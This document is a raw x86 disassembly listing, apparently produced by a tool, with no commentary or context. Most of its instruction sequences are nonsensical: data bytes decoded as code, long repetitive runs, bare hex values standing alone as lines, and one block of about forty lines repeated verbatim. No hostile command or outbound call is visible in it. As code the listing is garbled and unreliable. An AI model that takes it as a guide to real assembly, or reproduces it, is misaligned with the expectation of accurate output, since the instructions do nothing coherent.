and al 0x3
dec eax
add edx [ ebp + 0x3 ]
imul eax [ ebx ] 0xffffff91
add esp [ ecx + 0xe040103 ]
add al 0x47
add al 0x6a
add al 0x8b
add al 0xd4
add al 0xf4
add al 0x84
push es
adc [ edi ] eax
and eax [ edi ]
inc ebp
pop es
jne r-xdata
pop es
or al 0x8
push ss
or [ ebx + 0x8 ] al
jpe r-xdata
add [ edi ] 0xa5
pop es
retn
sub al 0x9
push ebp
or [ ebp + 0x209e709 ] esi
or dh [ ebp + 0xa ]
xchg esi eax
or ch [ eax - 0x12f551f6 ]
or cl [ ebx ]
or ecx [ ecx + 0xb ]
push esi
or edi [ edx + 0xb ]
mov [ ebx ] ecx
0x6d0bd40b 0x740c
or al 0xb1
or al 0xc1
or al 0x3c
or eax 0xd6d0d58
mov al [ 0xffffffffbd0da60d ]
or eax 0xdff0dc4
push ds
push cs
push esp
push cs
ja r-xdata
xchg esi eax
or [ edi - 0x7f736f8 ] ch
or [ ecx + ecx ] ch
test [ edi ] cl
cmpsb [ esi ] [ edi ]
push cs
mov ebp 0xee0ede0e
push cs
adc [ edi ] ecx
packsswb mmx1 [ ss : edi ]
sub_41ed75
adc [ ecx + edx + 0x59 ] al
adc [ esi + 0x11 ] ebp
adc [ ecx ] 0xffffff98
adc [ ebp - 0x28ee3def ] ebp
adc esp ebp
adc [ ecx ] eax
adc bl [ eax + 0x14 ]
ja r-xdata
or [ esi ] edx
push ebx
push ss
0x35170916 0x4a17
cmpsd [ esi ] [ edi ]
adc al 0xd2
adc al 0xec
adc al 0xc
adc eax 0x15301520
push ebp
adc eax 0x15ab1594
scasd [ edi ]
adc eax 0x16531609
sub_41f175
add [ edx ] al
add ah ch
add [ ebp ] esp
add [ eax ] eax
in eax dx
add [ ebp ] esp
add al [ eax ]
cmc
add [ edi ] esp
add al [ eax ]
test [ ecx ] 0x69
add [ edx ] al
add bh dh
add [ ebx ] ebp
add [ eax ] eax
stc
add [ ebp ] ebp
add al [ eax ]
clc
add [ ebp ] ebp
add [ eax ] eax
sti
add [ edi ] ebp
add al [ eax ]
cli
add [ edi ] ebp
add al [ eax ]
add eax 0x2007102
add [ esi ] al
add dh [ ebx ]
add al [ eax ]
pop es
add dh [ ebp ]
add al [ eax ]
or [ edx ] al
ja r-xdata
add al [ eax ]
pop ds
add bh [ ecx ]
add [ eax ] eax
and [ edx ] al
jns r-xdata
add al [ eax ]
sub al [ edx ]
jpo r-xdata
add [ eax ] eax
sub eax [ edx ]
jpo r-xdata
add al [ eax ]
sub al 0x2
jge r-xdata
add [ eax ] eax
sub eax 0x2007d02
add [ esi ] ch
add bh [ edi ]
add [ eax ] eax
das
add bh [ edi ]
add al [ eax ]
push eax
add al [ ecx + 0x6b000200 ]
add al [ ebx + 0x6c000200 ]
add al [ ebp + 0x6d000200 ]
add al [ edi + 0x6e000200 ]
add cl [ ecx + 0x6f000200 ]
add cl [ ebx + 0x16000600 ]
add [ edi ] bl
add [ esi ] al
add [ eax ] bl
add [ ebx ] ah
add [ esi ] al
add [ eax + eax ] bl
daa
add [ edx ] dl
add [ eax ] dl
pop ds
add [ edx ] dl
add [ edx ] dl
and eax [ eax ]
adc al [ eax ]
push esi
add [ edi ] ah
add [ ecx ] bh
xor al [ ebx + ebp * 4 ]
add edi [ ecx ]
xor al 0x4
lodsd [ esi ]
add edi [ ecx ]
add al 0xaf
add edi [ edx ]
add al 0x73
add bh [ edx ]
inc eax
add al 0x35
add [ edx ] edi
inc edx
add al 0xad
add edi [ edx ]
inc esp
add al 0xb7
add edi [ edx ]
inc esi
add al 0xb9
add edi [ edx ]
dec esp
add al 0xcb
add edi [ ebx ]
pop eax
add al 0x73
add bh [ ebx ]
pop edx
add al 0x35
add [ ebx ] edi
pushad
add al 0xcb
add edi [ ebx ]
bound eax [ ebp * 4 + 0x64007b03 ]
add al 0xb7
add edi [ ebx ]
add al 0xb9
add edi [ ebx ]
push 0x7d03e304
add [ edx + 0x4 ] dh
lodsd [ esi ]
add edi [ ebp ]
je r-xdata
jbe r-xdata
mov bh 0x3
jge r-xdata
add [ ebx + esi * 8 ] 0x3
jle r-xdata

add [ ebp * 4 - 0x7bff81fd ] 0x4
mov bh 0x3
jle r-xdata
xchg [ ebx + ecx * 8 ] al
add edi [ esi ]
mov [ ecx + edi * 4 ] al
add eax [ edi + 0x7d04ee00 ]
add [ ebx + 0x3f04f800 ] ecx
add al 0x8b
add [ eax ] cl
add eax 0x8d0449
sub [ 0xa5f043f ] al
mov bh 0xd
sbb al 0x19
into
sbb [ edi ] esp
sbb al [ ebp + ebx - 0x4b ]
add [ eax + eax + 0xca00c3 ] bh
popad
add [ edi - 0x3dfe71ff ] eax
add ecx ecx
add eax edx
add edi edx
add [ edx + eax ] esp
sub eax [ edx ]
pop edx
add eax 0xaf3086b
sti
or al [ ebx + 0xc ]
in eax 0xf
and [ eax ] edx
out dx eax
push ss
clc
push ss
xor eax 0x51184918
sbb [ ebx + 0x18 ] bl
jge r-xdata
lodsb [ esi ]
or eax 0x1430002
mov edi 0x2128b00
add [ eax ] al
add [ 0x3190f01 ] edi
add [ eax ] al
add [ ebx + 0x1 ] ecx
rcr [ ecx ] 0x4
add [ ecx + eax ] al
add [ 0x51a ] ebx
add [ eax ] al
add [ ebx + 0x1 ] ebp
sbb al [ ecx ]
add [ ecx + eax - 0x4d ] al
add [ esp + ebx + 0x2 ] ecx
add [ eax ] al
add ebx eax
add [ ebx ] esi
sbb eax 0xa0000006
add al 0x0
mov edi 0x4a00800
add al al
add [ eax ] dl
mov al [ 0xc10004 ]
and [ eax + 0xc20004 ] ah
xor [ eax + 0xc30004 ] ah
xor [ esp + eax - 0x5bff3c00 ] ah
movsb [ edi ] [ esi ]
add al 0x0
lds eax [ eax ]
sbb [ ebp + 0xc60004 ] ah
nop
movsd [ edi ] [ esi ]
add al 0x0
mov [ eax ] 0x4a608
enter 0x1400 0xa6
add al 0x0
leave
add [ eax ] ah
cmpsb [ esi ] [ edi ]
add al 0x0
0x6c00
sub_41f327
sbb [ esi + 0x75010018 ] bl
add [ edx + 0xa ] dl
add [ eax ] eax
inc ebx
add [ ebx + 0x10d1400 ] edx
add [ eax ] al
add [ ebx + 0x20dac00 ] ebx
add [ ebx + 0x1 ] al
mov edi 0x2128b00
add [ eax ] al
add [ 0x3190f01 ] edi
add [ eax ] al
add [ ebx + 0x1 ] ecx
rcr [ ecx ] 0x4
add [ ecx + eax ] al
add [ 0x51a ] ebx
add [ eax ] al
add [ ebx + 0x1 ] ebp
sbb al [ ecx ]
add [ ecx + eax - 0x4d ] al
add [ esp + ebx + 0x2 ] ecx
add [ eax ] al
add ebx eax
add [ ebx ] esi
sbb eax 0xa0000006
add al 0x0
mov edi 0x4a00800
add al al
add [ eax ] dl
mov al [ 0xc10004 ]
and [ eax + 0xc20004 ] ah
xor [ eax + 0xc30004 ] ah
xor [ esp + eax - 0x5bff3c00 ] ah
movsb [ edi ] [ esi ]
add al 0x0
lds eax [ eax ]
sbb [ ebp + 0xc60004 ] ah
nop
movsd [ edi ] [ esi ]
add al 0x0
mov [ eax ] 0x4a608
enter 0x1400 0xa6
add al 0x0
leave
add [ eax ] ah
cmpsb [ esi ] [ edi ]
add al 0x0
0x6c00
sub_427dcd
adc al [ eax + 0x127011c0 ]
or al 0x12
cmp [ eax + 0x2086012 ] 0x8
sbb eax 0x8080808
or [ esi ] al
sbb eax 0x8080805
or [ eax ] cl
sbb eax 0x80120905
lodsd [ esi ]
sbb eax 0x508021c
or al [ ecx ]
adc al [ eax + 0x10a05b0 ]
adc al [ eax + 0x10a05b4 ]
adc al [ eax + 0x10a05b8 ]
adc al [ eax + 0x10a05bc ]
adc al [ eax + 0x10a05c0 ]
adc al [ eax + 0x10a05c4 ]
adc al [ eax + 0x51d02c8 ]
add eax 0x12080100
insd
add al 0x0
add [ ecx ] ecx
or [ 0x51d0100 ] al
or [ esi ] al
add [ edx ] al
or [ 0x60805 ] bl
add al [ esi ]
sbb eax 0x70805
add cl [ esi ]
push cs
adc al [ edx + 0x4070634 ]
add cl [ eax ]
add cl [ eax ]
push es
pop es
add al 0x2
add al [ edx ]
or [ ebx ] cl
add [ 0xffffffff81120801 ] al
dec eax
or [ 0x90205 ] bl
add al [ ecx ]
adc al [ ecx - 0x427eed74 ]
add eax 0x18180200
sbb [ edx ] cl
add [ ecx + eax ] al
sbb eax 0x81120805
xor al 0x8
push es
add [ ecx ] al
or [ edx ] dl
or [ edi + eax ] 0x81120102
dec esp
or [ esi ] al
pop es
add dl [ edx ]
xor [ ecx + 0x8 ] 0x1020008
sbb eax 0x44811205
daa
pop es
push ss
sbb eax 0xe1801205
or [ edx ] dl
cmp cl 0xe
sbb eax 0x8051d05
adc cl [ ecx + 0xe ]
push cs
push cs
adc al [ edx + 0x1d0e0829 ]
add eax 0x120e051d
sbb cl 0x1d
sbb al 0xe
or [ edi ] al
and [ ebx ] al
push cs
sbb eax 0x7080805
and [ ebx ] al
add [ esi ] ecx
sbb eax 0x20050805
add [ 0x20060805 ] ebx
add [ ecx ] eax
adc [ edx + 0x120052d ] eax
add [ 0x1000505 ] ebx
sbb eax 0xa0e05
add eax 0x10080e08
or [ eax ] dl
or [ eax ] cl
str [ ebx ]
add [ edx ] edx
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
pop es
add [ edx ] al
or [ edx ] dl
xor [ eax + ecx ] 0x2010006
adc al [ ecx + 0x3070b50 ]
adc al [ eax - 0x67fed17 ]
adc al [ eax + 0x40008f9 ]
add [ edx ] edx
sbb al 0x1c
sbb al 0x6
add [ ecx ] al
add dl [ edx ]
xor [ eax ] 0x8070709
or [ eax ] cl
or [ eax ] cl
add cl [ eax ]
or al [ eax ]
add ebx [ 0x1d051d05 ]
add eax 0x704051d
add [ 0x2000705 ] ebx
add [ edx ] edx
sub eax 0x3000a0e
or [ edx ] dl
cmp [ eax ] 0x8348112
push es
add [ ecx ] al
sbb al 0x12
sub [ ebx + ecx + 0x18080500 ] 0x1110080e
adc [ eax ] 0x8
pop es
add [ ecx ] al
add [ eax ] edx
adc [ edx + 0x1070518 ] eax
adc al [ ecx + 0x8070a0d ]
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
add cl [ eax ]
or eax [ eax ]
add al 0x1
adc al [ ecx - 0x2f7eee74 ]
push cs
push cs
push es
pop es
add dl [ edx ]
or eax 0xd071a08
adc al [ eax + 0x120e0ed9 ]
xor [ ecx ] 0xe
sbb eax 0xf9801205
sbb eax 0x12051d05
sbb eax 0x5080e1c
and [ ecx ] al
push cs
sbb eax 0x1200605
sbb eax 0x8051d05
add [ ebx ] al
add [ edx ] edx
adc [ eax + ecx + 0x8 ] 0x2020009
adc al [ ecx + 0x9811209 ]
or [ edi ] eax
add eax 0x51d051d
or [ edx ] al
or [ 0xffffffff82120020 ] al
cmp [ esi ] ecx
add [ esi ] al
add [ esi ] ecx
push cs
adc al [ edx + 0x51d0e08 ]
adc al [ ecx + 0x30708dc ]
adc al [ edx + 0x8651204 ]
or [ eax ] al
add al [ ecx ]
sbb eax 0x50811205
pop es
add [ edx ] al
add [ eax ] ecx
adc al [ ecx + 0x2000758 ]
add [ edx ] edx
cmp [ eax ] 0x4000a08
or [ edx ] dl
adc [ ebp + ebx + 0x5 ] 0x80808
add al [ ecx ]
adc al [ ecx + 0x1a051d3c ]
pop es
adc eax 0x81d081d
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ 0x7081c ] bl
add al [ ecx ]
adc al [ ecx + 0x71e0858 ]
sbb [ eax ] cl
sbb eax 0x8080808
or [ eax ] cl
or [ eax ] cl
or [ 0x8081d08 ] bl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ eax ] cl
or [ 0x9081c ] bl
add eax 0x1c651201
sbb al 0x1c
sbb al 0x5
add [ edx ] al
sbb al 0xe
sbb al 0x7
pop es
add ebx [ edx + edx ]
adc cl 0x1c
or [ eax ] eax
add al [ ecx ]
adc al [ ecx - 0x2f7eee74 ]
add al 0x0
add [ esi ] eax
or [ ebx ] al
pop es
add [ esi ] eax
or al 0x20
add eax 0x110c0e01
or [ ebp + 0x11 ] 0x82
push ecx
add eax 0x1012006
adc al [ ecx + 0x3000811 ]
add cl [ eax ]
adc al [ ecx + 0x7070848 ]
add eax 0x2080808
or [ edi ] al
add [ edx ] al
sbb eax 0x51d0e05
sysret
or [ eax ] ecx
sbb eax 0x51d0805
sbb eax 0x1d080805
add eax 0x2000b08
adc al [ eax - 0x327fed33 ]
adc al [ eax + 0x10006cd ]
add [ edx ] edx
and esp 0x1206070c
adc [ 0xffffffff81120e08 ] 0x5080811
and [ eax ] al
adc al [ ecx + 0x200515 ]
adc al [ ecx + 0x5000b11 ]
add [ 0xffffffff81120805 ] ebx
dec eax
add cl [ eax ]
adc al [ edi ]
or ecx [ eax ]
or [ eax ] cl
or [ eax ] cl
or [ 0x4c81121c ] bl
sbb eax 0x8051d06
or eax [ eax ]
pop es
add [ edx ] edx
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
or eax 0x12010900
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
push cs
pop es
or [ esi ] ecx
push cs
push cs
push cs
adc al [ eax + 0x80e1d81 ]
or [ eax ] cl
or [ eax ] eax
add al 0x8
push cs
adc [ edx + 0x708025d ] eax
add [ edx ] al
add [ edx ] edx
or [ eax + 0x8 ] 0x804070a
adc al [ ecx + 0x4c81124c ]
or [ ecx ] cl
pop es
add al 0x1d
adc al [ eax + 0x8020285 ]
add [ edx ] eax
or [ eax ] eax
add al [ ecx ]
adc al [ ecx - 0x427eed04 ]
and [ edi ] al
adc [ eax ] cl
or [ eax ] cl
adc al [ edx + 0xe0e1d61 ]
adc al [ edx - 0x2b7eed9b ]
adc eax 0x1698212
sbb al 0x1d
add ebx [ 0x808080e ]
or [ eax ] cl
add eax 0x12010120
add eax 0x82120020
insd
push es
and [ ecx ] al
adc al [ edx + 0x20050865 ]
add [ edx ] dl
xor [ ebp + 0x5 ] 0x20
add al [ ecx ]
sbb al 0x1c
push es
adc eax 0x1698212
sbb al 0x4
and [ ecx ] al
sbb al 0x1c
or esp [ eax ]
add [ 0x1798212 ] edx
adc eax [ eax ]
adc eax [ eax ]
or [ eax ] al
add eax [ ecx ]
push cs
adc al [ ecx + 0xa0eb8 ]
add al 0x1
or [ eax ] cl
adc al [ ecx + 0x8051d54 ]
add [ ebx ] al
add [ esi ] ecx
adc al [ ecx + 0x7060e9c ]
add dl [ ecx ]
and [ eax + 0x12150908 ] 0xe022d81
adc [ ecx + 0x10005a0 ] eax
add [ edx ] edx
cmp [ edx ] ah
pop es
pop ss
sbb al 0xe
add bl [ 0x1d0e0e05 ]
add eax 0xe0e0e0e
push cs
add bl [ 0x51d0e05 ]
adc al [ edx + 0x1d0e1d7d ]
sbb al 0x8
or [ eax ] cl
sbb eax 0x200051c
sbb al 0x1c
sbb al 0x7
and [ edx ] al
add [ esi ] ecx
adc al [ ecx + 0x1200409 ]
sbb al 0xe
push es
add [ ebx ] al
add [ esi ] ecx
push cs
add al [ esi ]
add [ edx ] al
add [ edx ] edx
sbb al 0x7
add [ edx ] al
or [ esi ] cl
adc al [ ecx + 0x8070a9c ]
add cl [ eax ]
or [ ebx ] al
add cl [ eax ]
or [ eax ] cl
push es
add [ ecx ] al
add [ edx ] edx
add [ esi + ecx ] 0x6512010a
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
sbb al 0x1c
sbb al 0x7
add [ ecx ] al
sbb eax 0xb8811205
or al [ eax ]
add al 0x1
or [ eax ] cl
adc al [ ecx + 0x7051d38 ]
adc [ ecx ] al
add bl [ esi ]
add [ esi ] cl
push cs
or [ eax ] al
add dl [ edx ]
add [ ecx + 0x86d1218 ] 0x7
add al 0x18
sbb al 0x1e
add [ esi ] bl
add [ edx ] cl
and [ ebx ] al
adc al [ edx - 0x7dedfd7b ]
mov [ esi + eax ] ebx
and [ ecx ] al
add dl [ edx ]
add [ ebp + 0x2012004 ] 0x2
add eax [ esi ]
adc [ edx + eax + 0x6 ] ebp
or [ ebx ] al
push es
adc bl [ edi + eax + 0x7 ]
add al 0x11
insb
or [ eax ] ecx
or [ 0xffffffff80120000 ] al
lodsd [ esi ]
add eax [ esi ]
adc [ eax + 0x4 ] ebp
add [ eax ] eax
add [ eax ] al
add al 0x2
add [ eax ] al
add [ eax + ecx ] al
add [ eax ] al
add [ eax + edx ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax + eax * 2 ] al
add [ eax ] al
add [ eax + eax * 4 ] al
add [ eax ] al
add [ eax + eax ] al
add [ eax ] eax
add [ eax + eax ] al
add al [ eax ]
add [ edx ] al
push es
or [ ebx ] eax
push es
sbb eax 0x241e0205
add eax [ esi ]
adc [ eax + 0x3 ] edi
push ds
push esi
add al 0x5
and [ eax ] al
adc [ eax + 0x2070884 ] eax
adc [ eax - 0x7b7fee7c ] eax
add eax 0x8011010a
test [ 0xffffffff80110020 ] al
or [ eax ] 0x7
add dl [ ecx ]
add [ eax + 0x5808011 ] 0xa
add [ ecx ] edx
add [ eax + 0x11002005 ] 0x80
mov al [ 0x11020708 ]
and [ eax + 0x5a08011 ] 0xa
add [ ecx ] edx
and [ eax + 0x11002005 ] 0x80
mov [ eax ] cs
pop es
add dl [ ecx ]
or [ ecx + edx + 0xa058c80 ] 0x1
adc [ eax + 0x20058c ] eax
adc [ eax + 0x2070890 ] eax
adc [ eax - 0x6f7fee70 ] eax
add eax 0x8011010a
nop
add eax 0x80110020
pushfd
or [ edi ] al
add dl [ ecx ]
sbb [ ecx + edx + 0xa059c80 ] 0x1
adc [ eax + 0x20059c ] eax
adc [ eax + 0x2070894 ] eax
adc [ eax - 0x6b7fee6c ] eax
add eax 0x8011010a
xchg esp eax
add eax 0x80110020
cwde
or [ edi ] al
add dl [ ecx ]
sbb [ eax + 0x5988011 ] 0xa
add [ ecx ] edx
sbb [ eax + 0x11002005 ] 0x80
movsb [ edi ] [ esi ]
or [ edi ] al
add dl [ ecx ]
and [ ecx + edx + 0xa05a480 ] 0x1
adc [ eax + 0x13005a4 ] eax
add [ esi ] bl
add [ ecx ] cl
pop es
add eax 0x1c18001e
or [ esi ] bl
add [ eax + eax ] al
add [ eax ] ebx
or [ eax ] cl
add [ ecx + eax ] al
sbb eax 0x8180805
push es
add [ edx ] al
sbb al 0x18
adc ch [ ebp + 0x4 ]
add [ ecx ] al
add [ eax ] ebx
add eax 0x80110028
test [ 0xffffffff80110028 ] al
add [ 0xffffffff80110028 ] 0xa0
add eax 0x80110028
mov [ 0xffffffff80110028 ] es
nop
add eax 0x80110028
pushfd
add eax 0x80110028
xchg esp eax
add eax 0x80110028
cwde
add eax 0x80110028
movsb [ edi ] [ esi ]
add al 0x3
add [ eax ] al
add [ eax + 0x4000000 ] al
add al 0x0
add [ eax ] al
add al 0x6
add [ eax ] al
add [ ecx + ecx ] al
add [ eax ] al
add [ edi + eax ] al
add [ eax ] al
add [ ebx ] al
push es
adc [ esp + eax + 0x6 ] edi
adc al [ eax + 0x110604e8 ]
or [ eax + 0x91d0603 ] 0x3
push ds
invd
add [ edx + eax ] edx
push es
pop es
push cs
and [ esi ] al
adc al [ edx + 0x9091885 ]
adc [ ecx ] cl
adc al [ edx + 0x20081c89 ]
add al [ edx ]
adc [ ecx ] cl
adc al [ edx + 0x4200885 ]
add bl [ eax ]
or [ ecx ] ecx
adc [ ecx ] cl
mov edi cr0
adc al [ edx + 0x8091885 ]
or [ eax ] edx
or [ edx ] edx
or [ ecx + 0x520091c ] 0x2
sbb [ ecx ] cl
or [ ecx ] cl
adc [ ecx ] cl
pop ss
and [ edx + edx ] cl
add [ ebp + 0x18180e0e ] 0x2
or [ eax ] ebx
push cs
adc [ ecx ] dl
jo r-xdata
adc al [ edx + 0xa201185 ]
add cl [ esi ]
push cs
sbb [ eax ] bl
add cl [ ecx ]
sbb [ esi ] cl
adc [ ecx ] dl
jo r-xdata
adc [ edx + edx - 0x7e ] ebp
mov [ esp + ecx ] ebx
and [ ebx ] al
add dl [ eax ]
adc [ eax + 0x10 ] esi
adc [ edx + edx - 0x7e ] ebp
test [ ecx ] edx
and [ edx ] cl
or [ ecx + 0x3200a1c ] 0x2
adc [ eax ] cl
adc [ eax ] cl
adc al [ edx + 0x5200a85 ]
add bl [ eax ]
or [ eax ] dl
or [ eax ] cl
adc [ eax ] cl
adc [ eax ] ah
pop es
adc al [ edx + 0x1d081885 ]
add eax 0x12081008
or [ ecx + 0x220081c ] 0x2
adc [ eax ] cl
adc al [ edx + 0x5200a85 ]
add bl [ eax ]
or [ 0x8100805 ] bl
or al 0x20
add al 0x12
add [ ebp + 0x12081d18 ] 0x82
mov [ esi + eax ] ebx
and [ edx ] al
add bl [ eax ]
sbb eax 0x1200608
or [ edx ] edx
add [ ebp + 0x9022006 ] 0x18
sbb eax 0x4200b08
adc al [ edx + 0x12081885 ]
or [ ecx + 0x120061c ] 0x8
adc al [ edx + 0x2200585 ]
or [ eax ] bl
or [ esi ] cl
and [ edi ] al
adc al [ edx + 0x8081885 ]
or [ eax ] cl
adc al [ edx + 0x20081c89 ]
add eax 0x8081808
or [ eax ] cl
or al 0x20
add al 0x12
add [ ebp + 0x12091018 ] 0x82
mov [ eax + ecx ] ebx
and [ edx ] al
or [ eax ] dl
or [ edx ] edx
add [ ebp + 0x8022006 ] 0x18
adc [ ecx ] cl
or ah [ eax ]
add edx [ edx ]
add [ ebp - 0x767dedf8 ] 0x1c
add al 0x20
add [ edx ] eax
or [ 0xffffffff82120420 ] cl
test [ eax ] edx
adc [ eax + ecx + 0x12 ] esi
or [ ecx + 0x220091c ] 0x2
adc [ ecx ] dl
je r-xdata
adc [ eax + edx + 0x20 ] ebp
pop es
adc al [ edx + 0x10081885 ]
or [ eax ] cl
adc [ eax ] cl
adc al [ edx + 0x200a1c89 ]
add eax [ edx ]
or [ edx ] dl
or [ ecx + 0x320061c ] 0x2
or [ eax ] cl
or [ 0xffffffff82120520 ] cl
test [ eax ] ebx
or [ 0xffffffff89821205 ] bl
sbb al 0x7
and [ ebx ] al
add bl [ eax ]
or [ 0x7201005 ] bl
adc al [ edx + 0x1d081885 ]
add eax 0x12091009
or [ ecx + 0x5200a1c ] 0x2
sbb [ eax ] cl
sbb eax 0x9100905
or ah [ eax ]
add edx [ edx ]
add [ ebp - 0x767dede8 ] 0x1c
add al 0x20
add [ ecx ] ecx
sbb [ esi + eax ] al
adc al [ edx + 0x1206047d ]
or [ ebp + 0x12000005 ] 0x82
jge r-xdata
add [ ebp + 0x2022007 ] 0x10
adc [ eax + ecx + 0xc ] esi
and [ 0x8858212 ] al
or [ eax ] cl
adc al [ edx + 0x20061c89 ]
add eax [ edx ]
add eax 0x1c020200
sbb al 0x5
and [ eax ] al
adc al [ ecx + 0x509 ]
pop es
add al 0x12
cmp [ ebp + 0x12 ] 0x82
jge r-xdata
add al 0x6
adc al [ eax + 0x10008f0 ]
adc al [ edx - 0x6e7ded6f ]
add eax 0x80120000
[ edi ] al
add dl [ edx ]
xor al 0x12
xor al 0x5
or [ eax ] al
adc al [ eax + 0x22009f0 ]
adc al [ edx - 0x767ded7b ]
sbb al 0x6
and [ ecx ] al
add [ edx ] edx
add [ ebp + 0x1215060a ] 0x81
sub eax 0x81120e02
or [ 0x20e0307 ] eax
add al [ 0xffffffff81120020 ]
lds eax [ ebx ]
or [ eax ] al
add al [ esi + eax ]
adc al [ edx + 0x1200495 ]
push cs
add al [ edi ]
pop es
add edx [ edx ]
sbb [ ecx + 0x2006080e ] 0x1
adc al [ edx + 0x20060e99 ]
add [ edx ] edx
sbb [ ecx + 0x200091c ] 0x2
adc al [ edx - 0x6a7ded6b ]
or al [ edi ]
push es
push cs
push cs
sbb eax 0x80e1d03
or [ esi + eax ] al
adc al [ ecx + 0x1d060309 ]
push cs
or al [ edi ]
add eax 0xe1d080e
adc al [ ecx + 0x20040809 ]
add [ 0x5070c0e ] bl
sbb eax 0x8658212
adc al [ edx + 0x6020265 ]
and [ eax ] al
sbb eax 0x5658212
and [ eax ] al
adc al [ edx + 0x300069d ]
push cs
sbb al 0x1c
sbb al 0x3
add [ eax ] al
or [ 0xffffffff82120107 ] al
xchg ebp eax
add ecx [ eax ]
add [ esi ] cl
add ecx [ eax ]
add [ eax ] cl
add al 0x6
adc [ ecx + 0x424 ] eax
add [ eax ] al
add eax [ esi ]
sbb eax 0x2060208
add al 0x6
adc al [ ecx + 0x12060434 ]
cmp [ eax ] 0x81120604
inc eax
add al 0x6
adc al [ ecx + 0x28033c ]
or [ ebx ] al
sub [ eax ] al
add al [ ebx ]
push es
sbb eax 0x3070606
sbb eax 0x2080805
push es
add eax 0x40a0602
push es
adc al [ ecx + 0x12060454 ]
adc [ eax + 0x3 ] 0x40a0107
pop es
add al [ edx ]
or [ ebx ] al
sub [ eax ] al
or al [ esi + eax ]
adc al [ ecx + 0x120064c ]
add [ edx ] edx
adc [ esp + eax + 0x6 ] 0x9488112
and [ ecx + eax ] al
adc al [ ecx + 0x8080848 ]
push es
and [ edx ] al
add [ 0x6040205 ] ebx
adc [ ecx + 0x11060460 ] eax
and [ esp + eax + 0x6 ] 0x4688111
push es
adc [ ecx + 0x1106046c ] eax
xor [ eax + 0x4 ] 0x74811106
add al 0x6
adc al [ ecx + 0x120604bd ]
or eax 0x1012006
adc al [ ecx + 0x4070cc8 ]
adc al [ ecx - 0x377eed38 ]
adc al [ ecx + 0xb08c8 ]
add dl [ edx ]
add [ ecx + 0x12818212 ] 0x82
or [ eax + edx ] 0x1e0301
adc [ esi ] bl
add [ esi ] bl
add [ esi ] bl
add [ 0xffffffff8112010a ] al
enter 0x604 0x12
or [ esp + eax + 0x8821206 ] 0x81120604
cwde
push cs
and [ ecx + eax ] al
adc al [ ecx + 0x12051d8c ]
or [ eax ] 0x12
sbb [ eax + 0x1d0a0714 ] 0x12051d05
adc [ esi + ecx + 0xe088212 ] 0x81120e0e
fmul [ eax ]
or al [ eax ]
add eax [ ecx ]
adc al [ eax - 0x327fed33 ]
or [ esi ] al
and [ ecx ] al
add [ edx ] edx
or [ esi + eax + 0xe010320 ] 0x28030e0e
add [ esi ] cl
add eax [ esi ]
adc ah [ ebp + 0x4 ]
push es
adc [ edx + 0x1d0603a5 ] eax
add ecx [ eax ]
push es
adc eax 0x22d8112
push cs
sbb al 0xa
push es
adc eax 0x22d8112
push cs
adc [ ecx + 0x120604a0 ] eax
sbb [ ecx + 0x12150609 ] 0x12010182
sub [ edi + eax - 0x7dedeafa ] 0x80e0101
push es
adc eax 0x22d8112
push cs
or [ ecx ] cl
push es
adc eax 0x1018212
adc [ ecx + 0x120603a4 ] eax
dec ecx
add al 0x6
adc al [ ecx + 0x120604b4 ]
xor [ ecx + 0xb ] 0x11010320
and [ ebp - 0x7eed9aee ] 0xbd
add al 0x7
add cl [ esi ]
or [ eax ] cl
adc eax 0x1018212
adc al [ ecx + 0x121506ac ]
add [ ecx ] 0x1
push cs
or [ eax ] esp
add al [ ecx ]
adc al [ ecx - 0x567ded54 ]
sbb eax 0xe0e1107
sbb al 0x12
insd
adc ch [ ebp + 0xe ]
push cs
or [ edx ] dl
sbb [ ecx - 0x667dedf2 ] 0x12
sbb [ eax + ecx ] 0x12
sbb [ eax + ecx ] 0x8
or [ esi ] al
and [ ecx ] al
adc al [ edx + 0x20060399 ]
add [ ecx ] eax
adc al [ ecx + 0x40706ac ]
sbb al 0x8
or [ eax ] cl
add eax 0x130120
or [ edi ] al
add [ ecx ] al
adc [ ecx + 0xd6d12a8 ] eax
pop es
add eax 0x12a88111
or [ ecx ] 0xa5821108
or [ 0x6d120120 ] al
push cs
add eax 0x82110020
movsd [ edi ] [ esi ]
add eax 0x12010120
insd
adc [ edi ] al
or dl [ ecx ]
sub [ eax + 0x120e0808 ] 0xe0e9982
or [ esi ] cl
or [ eax + 0x123b0792 ] al
or [ ecx ] 0xe098112
push cs
push cs
adc [ ecx - 0x7dedea60 ] eax
add [ ecx ] eax
adc ah [ ebp + 0x12 ]
adc ah [ gs : ebp + 0x12 ]
sub [ ebp + 0x121c0808 ] 0x6d
or [ eax ] cl
or [ 0xffffffffa881111c ] bl
or [ eax + ecx ] bl
push cs
adc ah [ ebp + 0x8 ]
adc [ ecx + 0x1c8212a4 ] eax
adc [ ecx - 0x5a7dee13 ] eax
adc [ edx + 0x1c8212a5 ] eax
sbb eax 0x8098112
adc al [ edx + 0x1c82121c ]
adc eax 0x2b18211
push cs
sbb al 0x12
sbb [ edx + edx ] 0x82
sbb al 0x15
adc [ edx + 0x110e02b1 ] eax
and [ eax + 0x81c8212 ] 0x121c8212
sbb [ edx + 0x1b98211 ] 0x12
adc al [ gs : ecx + 0x1c8212c9 ]
adc al [ edx + 0x81c1d1c ]
adc al [ ecx + 0x1c82129d ]
or [ edx ] dl
sbb [ eax + ecx ] 0x12
sbb [ eax + ecx ] 0x8
or [ eax ] cl
or [ eax ] esp
add al [ ecx ]
adc al [ eax + 0x318112f1 ]
or [ eax ] eax
add al [ edx ]
adc [ edx - 0x5a7dee5b ] eax
add eax 0x82110000
movsd [ edi ] [ esi ]
or esp [ eax ]
add [ 0x2b58212 ] dl
adc eax [ eax ]
adc eax [ ecx ]
pop es
adc eax 0x2b58212
push cs
sbb al 0xb
and [ eax ] al
adc eax 0x2b18211
adc eax [ eax ]
adc eax [ ecx ]
pop es
adc eax 0x2b18211
push cs
sbb al 0x9
adc eax 0x2b58212
push cs
adc [ ecx + 0x111509a0 ] eax
xor [ ecx - 0x7eeef1fe ] 0xa0
